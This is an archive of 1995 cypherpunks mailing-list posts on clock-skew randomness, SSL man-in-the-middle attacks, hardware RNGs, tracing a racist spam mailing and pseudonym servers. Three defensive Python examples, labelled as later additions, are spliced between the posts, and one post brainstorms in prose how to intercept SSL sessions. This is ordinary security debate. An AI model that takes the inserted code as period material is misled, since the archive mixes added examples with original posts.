> The point? These "journalists" are tuned to looking for catchy quotes, all
...

It's in our interest to give them such catchy quotes, no?
Unless it would destroy us, of course...

...
> With no organization, no office, no coordination, we cannot "feed the media
> machine" the way it expects to be fed.

Only problem is, does anyone know of any other way to get our
ideas to be accepted by Joe Sixpack?

...
> Far better that journalists like Steven Levy and John Markoff subsribe to
> the list, or to condensations by people like Eric Blossom, and then deal
...

But then wouldn't that journalist act as a SpokesPunk?

Would you support such a jounalist writing about Cypherpunks?

What is the essential difference between a jounalist writing an
article and a volunteer writing a press release?

> Anarchy is part of our charm. More importantly, part of our theme.
...

A well-written press release could reflect that.

For example, some points could be presented in two ways (perhaps
even contradictory) with full attribution of who wrote which view.

Those who oppose the whole idea could be noted in the press release :-)
Unless they object to that in which case they wouldn't be.


Yes, No, Maybe? Definite Maybe?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGzxJCxV6mvvBgf5AQF1owP9GwgbLK1/HCq+iRKqw42q5Y6Kzbtmyda1
YJwblubOWacbVER2aURAN3m51MCsTXreuLxSbcm9dgP4Zk2071yZFGa7D2OF7dtS
pkfa5k1pn2v1EYplTvgJhAdTVJGqJ3sPc1VCIIWaRazeJjS0zA4d9rHmJWXb5DXp
6Hz8CbDw4UA=
=th3o
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sat, 30 Sep 95 15:50:27 PDT
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: my favorite random-numbers-in-software package (unix)
In-Reply-To: <199509302103.QAA26651@arnet.arn.net>
Message-ID: <199509302301.TAA16936@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


David Merriman writes:
> 
> Even with the exclusion of processors using single-source clocking for
> interval and CPU timing, this would *seem* to be somewhat hazardous. Any two
> clocking mechanisms that are 'mixed' are going to result in a number of
> harmonics, or beat frequencies. While your system - at any given instant -
> is quite likely to have a decent amount of randomness in it, I'd hazard a
> guess that repetitive use would result in a discernible pattern. Even
> something as 'coarse' as an interrupt timer has a finite range that it can
> (must) operate in. Even if the CPU oscillator is based on a ceramic
> resonator (nowhere near as stable/accurate as a crystal), the clock on it is
> going to stay within +/-1% (worst case, for a *really* cheap oscillator) of
> frequency, and drift not more than some number of Parts Per Million per
> Period. Mixing the innate (relative) accuracy of two oscillators, and the
> necessarily limited amount of drift that they're capable of, would seem to
> result in an unacceptably low-yield source of 'real' randomness.

I'm the first to agree that, in the absence of some good analysis of
the exact platform on which it is run, the clock-skew approach is built
on a very weak foundation.  But informal (and completely ad hoc)
analysis suggests that it might be more promising than you'd first
expect.  While the drift between the two clocks is likely only very small,
we're also not asking for very much; we need less than one bit
worth of uncertainty in an accumulator that burns processor cycles until
some (smaller) number of clock intervals have occurred.  (The OS might
also not give you all those cycles, adding to the uncertainty, although
you can't really count on this in the case of high-priority processes or
unloaded machines).

I (and a few others) have run some tests on this on a couple of (bare)
processors in an effort to find artifacts of the clock periods in the
low-order bits of the counter, with no success.  This, of course, hardly
constitutes a "proof".

I'd love to see some good analysis of this technique, particularly with
an eye toward quantifying the quality and bandwidth of the output and
finding better parameters for the minimum interval rate, etc.

-matt

PS there are other "magic" techniques for getting randomness without special
hardware that are proposed from time to time but that never really undergo
enough analysis for my taste.  For example, at CRYPTO '94 (or maybe '93)
there was an interesting proposal to use software to measure the air flow
inside the disk drive.
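
The low-order-bit test described in this message, as an added example that is not part of the original post or of the package it discusses. The sampling model (a free-running counter read at each timer tick, with optional Gaussian jitter) and every parameter value are constructed assumptions; the model says nothing about how much jitter a real machine has, which is the open question raised above.

```python
import math
import random


def interval_counts(n, ticks_per_interval, jitter_sd=0.0, seed=0):
    """Constructed model: a free-running counter is read at each timer tick.

    Tick k fires at counter time k * ticks_per_interval, plus optional
    Gaussian jitter measured in counter units. Returns how far the counter
    advanced in each of the n intervals.
    """
    rng = random.Random(seed)
    reads = []
    for k in range(n + 1):
        t = k * ticks_per_interval
        if jitter_sd:
            t += rng.gauss(0.0, jitter_sd)
        reads.append(math.floor(t))
    return [later - earlier for earlier, later in zip(reads, reads[1:])]


def low_bits(counts):
    """Keep only the least significant bit of each count."""
    return [c & 1 for c in counts]


def autocorrelation(bits, lag):
    """Normalised autocorrelation of a bit sequence at the given lag."""
    n = len(bits)
    mean = sum(bits) / n
    var = sum((b - mean) ** 2 for b in bits)
    if var == 0:
        return 0.0  # constant sequence: no structure to correlate
    cov = sum((bits[i] - mean) * (bits[i + lag] - mean) for i in range(n - lag))
    return cov / var


def strongest_lag(bits, max_lag=32):
    """Lag in 1..max_lag with the largest |autocorrelation|, and its value.

    A value near +/-1 is the kind of clock-period artifact (beat pattern)
    the test looks for; values near 0 at every lag mean this particular
    test found no periodic structure, which is not a proof of randomness.
    """
    best = max(range(1, max_lag + 1),
               key=lambda lag: abs(autocorrelation(bits, lag)))
    return best, autocorrelation(bits, best)


if __name__ == "__main__":
    # Two ideal oscillators whose ratio is 1000.25 counter ticks per interval:
    # the counts repeat 1000, 1000, 1000, 1001, so the low bit beats with
    # period 4.
    ideal = low_bits(interval_counts(4096, 1000.25))
    print("ideal clocks   :", strongest_lag(ideal))

    # Same ratio, with constructed jitter of 50 counter ticks per read.
    noisy = low_bits(interval_counts(4096, 1000.25, jitter_sd=50.0, seed=1))
    print("jittered clocks:", strongest_lag(noisy))
```

To apply the same check to a real machine, replace the output of `interval_counts` with counter values recorded from that machine.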




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 30 Sep 95 19:20:06 PDT
To: Eric Murray <ericm@lne.com>
Subject: Re: NetScape's dependence upon RSA down for the count!
In-Reply-To: <199509302336.QAA23456@slack.lne.com>
Message-ID: <Pine.SOL.3.91.950930185650.4661A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 30 Sep 1995, Eric Murray wrote:

> What you have described is the classic 'man in the middle' attack.
> Netscape claims that SSL V.3 is immune to the MITM attack in
> appendix D.4 of the SSL V.3 spec. 

I think you're misunderstanding the claim somewhat - what D.4 does is warn 
implementors that they should perform some means of associating 
hostnames and certificates. You can't just use SSL out of the box without 
doing anything in the application to check. 

My currently recommended approach is to enforce the verisign requirement 
that all valid hostnames for the server be included in the certificate as 
CN values. This allows the check to be made below the application layer. 
Unfortunately a lot of currently issued certificates are non-compliant 
(even Verisign and netscape :-); any fully automated implementation needs 
a static table of hostname aliases; interactive applications can 
display certificates for manual review.

> 
> You will need to get the 'filter' (MITM) key signed by Verisign.
> Or hack Verisign's server-key-signing key.

This is not really much protection. Getting hold of any key is much 
easier than getting a specific key, and don't forget there are a number 
of vulnerable keys floating around until their expiration dates pass. 

This attack has been known about for a long time, and is too obvious to 
be really interesting; I implemented a demonstration of the attack as 
part of developing a protection. If anybody is interested I can mail them my
report. 

The variant of the attack I implemented is useless for anything but 
demonstration purposes, or I'd ask sameer for a T-shirt. The external fix 
is a bit more useful, but there doesn't seem to be a patchnetscape alias :-)

Simon
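
The hostname-to-certificate binding discussed in this thread, as an added example that is not part of the original posts and is not Netscape's or any SSL library's code. The certificate record, CA name, hostnames and alias table are constructed assumptions, and the CA signature check is represented by a flag rather than real cryptography.

```python
from dataclasses import dataclass

# Constructed sample data: every name below is illustrative only.
TRUSTED_ISSUERS = {"Example Root CA"}

# Static alias table for fully automated clients: the hostname that was
# requested -> other names the same operator is known to use in its cert.
HOST_ALIASES = {
    "shop.example": {"www.shop.example"},
}


@dataclass(frozen=True)
class Certificate:
    common_names: tuple   # every CN value carried in the certificate subject
    issuer: str
    signature_ok: bool    # outcome of the CA signature check, done elsewhere


def _norm(host):
    """Hostnames compare case-insensitively; ignore a trailing root dot."""
    return host.strip().rstrip(".").lower()


def chain_only_accepts(cert):
    """Accept any certificate signed by a trusted CA, with no name binding."""
    return cert.signature_ok and cert.issuer in TRUSTED_ISSUERS


def bound_accepts(cert, requested_host, aliases=HOST_ALIASES):
    """Chain check plus the binding: the requested name (or a listed alias
    of it) must appear among the certificate's CN values."""
    if not chain_only_accepts(cert):
        return False
    wanted = _norm(requested_host)
    acceptable = {wanted} | {_norm(a) for a in aliases.get(wanted, ())}
    presented = {_norm(cn) for cn in cert.common_names}
    return bool(acceptable & presented)


# Constructed certificates for the walk-through.
SERVER_CERT = Certificate(("shop.example",), "Example Root CA", True)
ALIAS_CERT = Certificate(("www.shop.example",), "Example Root CA", True)
# A genuine, CA-signed certificate that belongs to some other host: the
# "any key" case raised in the thread.
OTHER_VALID_CERT = Certificate(("filter.example",), "Example Root CA", True)
# Right name, but not signed by a CA the client trusts.
UNSIGNED_CERT = Certificate(("shop.example",), "Unknown CA", False)


def compare(requested_host):
    """Return {label: (chain_only, bound)} for each sample certificate."""
    samples = {
        "server": SERVER_CERT,
        "alias": ALIAS_CERT,
        "other-valid": OTHER_VALID_CERT,
        "unsigned": UNSIGNED_CERT,
    }
    return {
        label: (chain_only_accepts(c), bound_accepts(c, requested_host))
        for label, c in samples.items()
    }


if __name__ == "__main__":
    for label, result in compare("shop.example").items():
        print(f"{label:12s} chain-only={result[0]!s:5s} bound={result[1]}")
```

The row to watch is `other-valid`: a client that only checks the CA signature accepts it, and the name binding is what rejects it.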





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 30 Sep 95 16:41:12 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <ac9161a3050210040cbd@[205.199.118.202]>
Message-ID: <199509302340.TAA25393@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> 2. Incorporating Am-241 or other alpha emitters in microcurie levels would
> require licensing, regulatory oversight, etc., etc. Don't count on it.
> 
> 3. Data rates are fairly low. Anything that "clicks" at high rates (> 1K
> counts per second) would be too radioactive to ship.
> 
> 4. Zener diodes and other random noise sources are cheaper to build, more
> consistent in output, and easier to integrate into actual products.

However, radiation detection devices are far easier to assure correct
operation. You can buy pre-built radiation counters with RS-232
interfaces, so it's really just a question in many cases of buying them
and small radiation sources, the latter of which is available in most
scientific supply catalogs. Unlike other devices, it's very hard for
outsiders to tamper with radiation sources to make them produce
specially skewed numbers....

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dakidd@cris.com (Don Bruder)
Date: Sun, 1 Oct 95 07:06:58 PDT
Subject: Re: WHERE did this come from?
In-Reply-To: <44kgtb$88i@news.rain.org>
Message-ID: <dakidd-3009952034080001@192.0.2.1>
MIME-Version: 1.0
Content-Type: text/plain


In article <44kgtb$88i@news.rain.org>, rivaud@rain.org wrote:

:This is a multi-part message in MIME format.
:
:---------------------------------17921121372935
:Content-Transfer-Encoding: 7bit
:Content-Type: text/plain; charset=us-ascii
:
:Attached to this is, (I hope), the header text from an unsolicited e-mail 
:message I received.  The return address does not work.  WHY? How can I 
:inform the sender that I hope to never receive their material again?
:
:I tried "reply-all" through Eudora, but my reply got bounced back to me 
:as undeliverable.
:
:I have removed the content of the original message. I don't know why it 
:was sent to me, but it contained material that I found offensive.
:
:Any help, or words of wisdom and enlightenment would be appreciated. 
:Information would be nice too.  
:
:Thanks.
:
:-------------header should be below here-------------- i hope...--------
:
:
:
:---------------------------------17921121372935
:Content-Transfer-Encoding: quoted-printable
:Content-Type: text/plain
:
:Return-Path: Crusader@national-alliance.org
:Received: from asso.nis.garr.it (asso.nis.garr.it [192.12.192.10]) by coyote.rain.org (8=
:6.12/CSE) with SMTP id FAA20270; Sat, 30 Sep 1995 05:58:42 -0700
:From: Crusader@national-alliance.org
:Received: by asso.nis.garr.it (4.1/1.34/ABB950929)
:        id AA14320; Sat, 30 Sep 95 13:02:20 +0100
:Received: by mercury.sfsu.edu (5.0/SMI-SVR4) 
:        id AA21676; Sat, 30 Sep 95 03:43:27 -0700
:Date: Sat, 30 Sep 95 03:43:27 -0700
:Message-Id: <91324721788@National-Alliance.org>
:Subject: The Long March 
:Apparently-To: Crusader@National-Alliance.org
:
:
:
:If you are concerned about the fate Western/American civilization and its
:people, please take the time to read this article.

<Massive CHOP of utter garbage deleted>
 

Welcome to the club, guy... 

I found this drivel in my mailbox this morning too.

Here's the headers from mine, if anybody thinks it will help track these morons.

<Begin header block>
Return-Path: <Crusader@national-alliance.org>
Received: from asso.nis.garr.it by deathstar.cris.com [1-800-745-CRIS (voice)]
From: <Crusader@national-alliance.org>
Errors-To: Crusader@national-alliance.org
Received: by asso.nis.garr.it (4.1/1.34/ABB950929)
        id AA09169; Sat, 30 Sep 95 03:14:27 +0100
Received: by mercury.sfsu.edu (5.0/SMI-SVR4) 
        id AA21676; Fri, 29 Sep 95 19:23:27 -0700
Date: Fri, 29 Sep 95 19:23:27 -0700
Message-Id: <91324721846@National-Alliance.org>
Subject: The Long March 
Apparently-To: Crusader@National-Alliance.org
<end header block>

Looks to me like it originally gated into the mail-system at
mercury.sfsu.edu, wherever that is. From who is beyond my understanding.
Hopefully somebody can find out and let the appropriate people know so it
can be stopped from happening again.

I get enough junk in my paper mailbox without having to wade through it in
my email box!

-- 
+-------------------+ \__    Roadkill on the information superhighway...
|Don Bruder         | |  \       AUGH! +-------------------------------+
|dakidd@cris.com    | |_@_\____&   /   | I will choose a purpose clear:|
|I eat my roadkill! |_|____|__@|  @    | I will choose Free-will -Rush |
+/.\/.\--------+ /.\/.\=(__)/.\] \|/   +-------------------------------+
_\_/\_/__________\_/\_/_____\_/__/_\__     Finger for PGP public key
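
Reading the Received chain in the header block quoted in this message, as an added example that is not part of the original post. The sample is that header block copied inline; the assumption that deathstar.cris.com is the recipient's own mail server comes from the top Received line, and only lines written by the recipient's own server are treated as reliable, since any Received line below them was supplied by an upstream host and can be forged.

```python
import re
from email import message_from_string

# The header block quoted in the message above, embedded so this runs offline.
SAMPLE_HEADERS = """\
Return-Path: <Crusader@national-alliance.org>
Received: from asso.nis.garr.it by deathstar.cris.com [1-800-745-CRIS (voice)]
From: <Crusader@national-alliance.org>
Errors-To: Crusader@national-alliance.org
Received: by asso.nis.garr.it (4.1/1.34/ABB950929)
        id AA09169; Sat, 30 Sep 95 03:14:27 +0100
Received: by mercury.sfsu.edu (5.0/SMI-SVR4)
        id AA21676; Fri, 29 Sep 95 19:23:27 -0700
Date: Fri, 29 Sep 95 19:23:27 -0700
Message-Id: <91324721846@National-Alliance.org>
Subject: The Long March
Apparently-To: Crusader@National-Alliance.org

"""


def received_hops(raw):
    """Return the Received hops, newest first, as (from_host, by_host).

    Each mail server prepends its own Received line, so the first one in
    the message is the most recent hop. A missing clause yields None.
    """
    msg = message_from_string(raw)
    hops = []
    for value in msg.get_all("Received", []):
        flat = " ".join(value.split())          # undo header folding
        frm = re.search(r"\bfrom\s+(\S+)", flat)
        by = re.search(r"\bby\s+(\S+)", flat)
        hops.append((frm.group(1) if frm else None,
                     by.group(1) if by else None))
    return hops


def trace(raw, my_servers):
    """Split the chain into what the recipient's servers recorded and what
    upstream hosts merely claimed.

    my_servers: hostnames of mail servers the recipient controls or trusts.
    """
    hops = received_hops(raw)
    handoff_peer = None
    for frm, by in hops:                        # newest first
        if by not in my_servers:
            break
        handoff_peer = frm                      # last host seen by our side
    return {
        "handoff_peer": handoff_peer,
        "unverified_hops": [by for _, by in hops if by not in my_servers],
        "claimed_origin": hops[-1][1] if hops else None,
    }


if __name__ == "__main__":
    for key, value in trace(SAMPLE_HEADERS, {"deathstar.cris.com"}).items():
        print(f"{key:16s} {value}")
```

A report to a postmaster is best addressed to the operator of `handoff_peer`, whose logs can confirm or refute the hops listed below it.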




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rivaud@rain.org
Date: Sun, 1 Oct 95 05:50:42 PDT
Subject: WHERE did this come from?
Message-ID: <44kgtb$88i@news.rain.org>
MIME-Version: 1.0
Content-Type: text/plain

Attached to this is, (I hope), the header text from an unsolicited e-mail 
message I received.  The return address does not work.  WHY? How can I 
inform the sender that I hope to never receive their material again?

I tried "reply-all" through Eudora, but my reply got bounced back to me 
as undeliverable.

I have removed the content of the original message. I don't know why it 
was sent to me, but it contained material that I found offensive.

Any help, or words of wisdom and enlightenment would be appreciated. 
Information would be nice too.  

Thanks.

-------------header should be below here-------------- i hope...--------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rivaud@rain.org
Date: Sun, 1 Oct 95 06:16:21 PDT
Subject: Re: WHERE did this come from?
In-Reply-To: <44kgtb$88i@news.rain.org>
Message-ID: <44kh2m$8sa@news.rain.org>
MIME-Version: 1.0
Content-Type: text/plain


OK, I screwed up.  Sorry to take up all the space with the text of it.

But, whether you agree with it or not, if you know from whence it came 
and how they sent it, I would like to know.  

Thanks again.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 30 Sep 95 19:44:08 PDT
To: tcmay@got.net>
Subject: Re: "Notes" to be Eclipsed by "Netscape"
Message-ID: <9510010242.AA06388@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> I've seen Notes running ...
> but my access to it was only marginal.
> But, knowing the software, it wouldn't surprise me if there were 
> some serious bugs in the security code.

Er, sounds to me like you're leaping to some conclusions...

At any rate, one of the designers of Notes's security was Charlie Kaufman
(formerly of Digital, recent author of a security book mentioned here) and
he is No Slouch.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 21:46:56 PDT
To: Eric Murray <ericm@lne.com>
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9510010446.AA11983@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain


> BTW your 'offer' is silly- this is not a trivial amount of work, and you
> would not deserve any credit for coming up with so ordinary an
> attack.  Write the code yourself, or pay the market rate for it.
> -- 
> Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm

So is the Tee Shirt offer, and so is cracking the RSA public key
algorithm ... the point is that at least two teams did it.

My offer is trivial in $$'s I agree, but the challenge I offer is to
focus on the weaknesses of SSL rather than its strengths (large keys).
I suspect this is easier than most people think, so maybe I should
offer a Tee Shirt instead?

I suspect the certificates can be attacked in one of several ways.

The most likely is that the filter can use the server's certificate and fake,
forge, or simply substitute a valid one in the filter's name for the client.
This might mean that the filter has to become a trusted server as well.
I don't see any problems with the filter playing client to the server
given the SSL protocol.

Another is since the clients are often distributed
over the net, that another filter is installed to recognize clients and alter
them on the fly to avoid the client/filter problem in the future.

Another tack is based on getting very close to the server (in a bridge or
router in the direct path to the server) in which the filter might actually
be able to get valid certificates signed in the server's name, while
eating the real requests.

The reality is that all three parties are strangers, and I have had doubts
about the very nature of certificates & public key in this case.

John Bass
DMS Design





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don.Stephenson@Eng.Sun.COM (Don Stephenson)
Date: Sat, 30 Sep 95 23:16:29 PDT
To: ses@tipper.oit.unc.edu
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9510010614.AA08538@icenine.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain



> From ses@tipper.oit.unc.edu Sat Sep 30 20:43:51 1995

> My currently recommended approach is to enforce the verisign requirement 
> that all valid hostnames for the server be included in the certificate as 
> CN values. This allows the check to be made below the application layer. 
> Unfortunately a lot of currently issued certificates are non-compliant 
> (even Verisign and netscape :-); any fully automated implementation needs 
> a static table of hostname aliases; interactive applications can 
> display certificates for manual review.

I don't think binding hostnames to certificates helps much because 
both hostnames and IP addresses can be spoofed and DNS servers can be 
subverted.  The important thing is the binding to the "service" name or 
definition (e.g. InterState online banking service).


> This is not really much protection. Getting hold of any key is much 
> easier than getting a specific key, and don't forget there are a number 
> of vulnerable keys floating around until their expiration dates pass. 

Well of course, if the secret key of the server (or worse yet, certificate 
authority) is compromised, all bets are off.  That's true of just about any 
protocol you can dream up.

Are you just referring to the problem of accurate and up to date certificate 
revocation lists (CRL) being available?

If so, you're right, this is a very difficult problem to solve without 
having a truly reliable and pervasive key-distribution & CRL system 
deployed throughout the world.

- Don







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@skypoint.com
Date: Sat, 30 Sep 95 21:18:11 PDT
To: cypherpunks@toad.com
Subject: Digests No Longer Available
Message-ID: <m0szFpk-0005HSC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Due to some personal issues, I am being forced to cut back my net 
involvement. Cypherpunks and its digests are a casualty of this. 
Effective immediately I will no longer be keeping digests of the 
list.  Hopefully in a few months I'll be back.

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Thu, 26 Oct 1995 19:37:33 +0800
To: cypherpunks@toad.com
Subject: Linux security issues
Message-ID: <199510260304.VAA00205@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


 
Has anyone heard of any information on the Linux swap partition,
for example, if it does me the favor of storing my pgp passphrase?
 
Anyone who's interested in compiling PGP under ELF, add ASMDEF="-DSYSV"
to the end of their linux make line.

Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Thu, 26 Oct 1995 14:00:11 +0800
To: cypher@infinity.nus.sg
Subject: Your Majordomo request results
Message-ID: <9510260555.AA10275@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Your request of Majordomo was:
>>>> subscribe cypherpunks cypher@infinity.nus.sg
Succeeded.
Your request of Majordomo was:
>>>> end
END OF COMMANDS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Thu, 26 Oct 1995 14:02:09 +0800
To: cypher@infinity.nus.sg
Subject: Welcome to cypherpunks
Message-ID: <9510260555.AA10276@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Welcome to the cypherpunks mailing list!

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@toad.com" with the following command
in the body of your email message:

    unsubscribe cypherpunks cypher@infinity.nus.sg

Here's the general information for the list you've
subscribed to, in case you don't already have it:



About cypherpunks
-----------------

I. Administrivia (please read, boring though it may be)

The cypherpunks list is a forum for discussing personal defenses for
privacy in the digital domain.  It is a high volume mailing list.  If
you don't know how to do something, like unsubscribe, send mail to

	majordomo@toad.com

and the software robot which answers that address will send you back
instructions on how to do what you want.  If you don't know the
majordomo syntax, an empty message to this address will get you a help
file, as will a command 'help' in the body.  Even with all this
automated help, you may still encounter problems.  If you get really
stuck, please feel free to contact me directly at the address I use
for mailing list management:

	cypherpunks-owner@toad.com

Please use this address for all mailing list management issues.  Hint:
if you try to unsubscribe yourself from a different account than you
signed up for, it likely won't work.  Log back into your old account
and try again.  If you no longer have access to that account, mail me
at the list management address above.

For other questions, my list management address is not the best place,
since I don't read it every day.  To reach me otherwise, send mail to

	eric@remailer.net

This address is appropriate for emergencies (and wanting to get off
the list is never an emergency), such as the list continuously spewing
articles.  Please don't send me mail to my regular mailbox asking to
be removed; I'll just send you back a form letter.

Do not mail to the whole list asking to be removed.  It's rude.  The
-request address is made exactly for this purpose.

To post to the whole list, send mail to

	cypherpunks@toad.com

If your mail bounces repeatedly, you will be removed from the list.
Nothing personal, but I have to look at all the bounce messages.

There is no digest version available.

There is an announcements list which is moderated and has low volume.
Announcements for physical cypherpunks meetings, new software and
important developments will be posted there.  Mail to

	cypherpunks-announce-request@toad.com

if you want to be added or removed to the announce list.  All
announcements also go out to the full cypherpunks list, so there is no
need to subscribe to both.


II. About cypherpunks

The cypherpunks list is not designed for beginners, although they are
welcome.  If you are totally new to crypto, please get and read the
crypto FAQ referenced below.  This document is a good introduction,
although not short.  Crypto is a subtle field and a good understanding
will not come without some study.  Please, as a courtesy to all, do
some reading to make sure that your question is not already frequently
asked.

There are other forums to use on the subject of cryptography.  The
Usenet group sci.crypt deals with technical cryptography; cypherpunks
deals with technical details but slants the discussion toward their
social implications.  The Usenet group talk.politics.crypto, as it
says, is for political theorizing, and cypherpunks gets its share of
that, but cypherpunks is all pro-crypto; the debates on this list are
about how to best get crypto out there.  The Usenet group
alt.security.pgp is a pgp-specific group, and questions about pgp as
such are likely better asked there than here.  Ditto for
alt.security.ripem.

The cypherpunks list has its very own net.loon, a fellow named L.
Detweiler.  The history is too long for here, but he thinks that
cypherpunks are evil incarnate.  If you see a densely worded rant
featuring characteristic words such as "medusa", "pseudospoofing",
"treachery", "poison", or "black lies", it's probably him, no matter
what the From: line says.  The policy is to ignore these postings.
Replies have never, ever, not even once resulted in anything
constructive and usually create huge flamewars on the list.  Please,
please, don't feed the animals.


III. Resources.

A. The sci.crypt FAQ

anonymous ftp to rtfm.mit.edu:pub/usenet-by-group/sci.crypt

The cryptography FAQ is a good online intro to crypto.  Very much worth
reading.  Last I looked, it was in ten parts.

B. cypherpunks ftp site

anonymous ftp to ftp.csua.berkeley.edu:pub/cypherpunks

This site contains code, information, rants, and other miscellany.
There is a glossary there that all new members should download and
read.  Also recommended for all users are Hal Finney's instructions on
how to use the anonymous remailer system; the remailer sources are
there for the perl-literate.

C. Bruce Schneier's _Applied Cryptography_, published by Wiley

This is required reading for any serious technical cypherpunk.  An
excellent overview of the field, it describes many of the basic
algorithms and protocols with their mathematical descriptions.  Some
of the stuff at the edges of the scope of the book is a little
incomplete, so short descriptions in here should lead to library
research for the latest papers, or to the list for the current
thinking.  All in all, a solid and valuable book.  It's even got
the cypherpunks-request address.


IV. Famous last words

My preferred email address for list maintenance topics only is
hughes@toad.com.  All other mail, including emergency mail, should go
to hughes@ah.com, where I read mail much more regularly.

Enjoy and deploy.

Eric

-----------------------------------------------------------------------------

Cypherpunks assume privacy is a good thing and wish there were more
of it.  Cypherpunks acknowledge that those who want privacy must
create it for themselves and not expect governments, corporations, or
other large, faceless organizations to grant them privacy out of
beneficence.  Cypherpunks know that people have been creating their
own privacy for centuries with whispers, envelopes, closed doors, and
couriers.  Cypherpunks do not seek to prevent other people from
speaking about their experiences or their opinions.

The most important means to the defense of privacy is encryption. To
encrypt is to indicate the desire for privacy.  But to encrypt with
weak cryptography is to indicate not too much desire for privacy.
Cypherpunks hope that all people desiring privacy will learn how best
to defend it.

Cypherpunks are therefore devoted to cryptography.  Cypherpunks wish
to learn about it, to teach it, to implement it, and to make more of
it.  Cypherpunks know that cryptographic protocols make social
structures.  Cypherpunks know how to attack a system and how to
defend it.  Cypherpunks know just how hard it is to make good
cryptosystems.

Cypherpunks love to practice.  They love to play with public key
cryptography.  They love to play with anonymous and pseudonymous mail
forwarding and delivery.  They love to play with DC-nets.  They love
to play with secure communications of all kinds.

Cypherpunks write code.  They know that someone has to write code to
defend privacy, and since it's their privacy, they're going to write
it.  Cypherpunks publish their code so that their fellow cypherpunks
may practice and play with it.  Cypherpunks realize that security is
not built in a day and are patient with incremental progress.

Cypherpunks don't care if you don't like the software they write. 
Cypherpunks know that software can't be destroyed.  Cypherpunks know
that a widely dispersed system can't be shut down.

Cypherpunks will make the networks safe for privacy.

[Last updated Mon Feb 21 13:18:25 1994]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Thu, 26 Oct 1995 21:25:33 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <acb4d26a0e021004987b@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 3:35 PM 10/23/95, Futplex wrote:
>Lance Cottrell writes:
>> I think one solution to this problem is to encourage (require) the use of
>> pseudonym servers. Having a server like alpha as the entity on the from
>> line has several advantages.
>>
>> 1) Less Spam since it takes some effort to set up the nym and it will be
>> taken away as soon as the spam starts.
>
>I fear this will be a short-lived gain. User-friendly scripts for
>establishing pseudonymous accounts are pretty easy to write. They may be
>beyond the average Fast Money Maker, but I expect myself and others will be
>putting them out on the Net for general consumption.

One need not automate the process of setting up anonymous accounts. One
might also require some sort of exchange before activating the nym to
verify that the return address is working.

<SNIP>
>Semi-permanent account status confers privileges to the user, IMHO. I
>believe a pseudonymous account ideally should be treated the same as a
>regular account on an ISP. For example, an admin will not unilaterally close
>an account upon receiving a single complaint about the account user.
>Certainly I don't know of an ISP that routinely blocks its users' accounts
>from sending mail to selected other accounts. Lest I seem too presumptuous,
>let me say that I realize all immediately foreseeable pseudonymizers are
>free services. Clearly these service providers can set whatever policies they
>wish, and are not directly competing with the fee-charging ISPs. Perhaps
>future fee-charging pseudonymizers will consider these criteria in offering
>enhanced services.
>
>-Futplex <futplex@pseudonym.com>

I agree. Both free and for-fee nym servers must clearly spell out what
actions will result in the termination of the nym. Perhaps 1 spam, 1
systematic harassment, or more than 5 serious complaints per month. Obviously
this would need to be tuned to preserve free speech while allowing abusers
to be quickly squelched. I would imagine an ecology of these servers would
develop with some short lived permissive servers mixed with long lived more
restrictive ones.

        -Lance


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
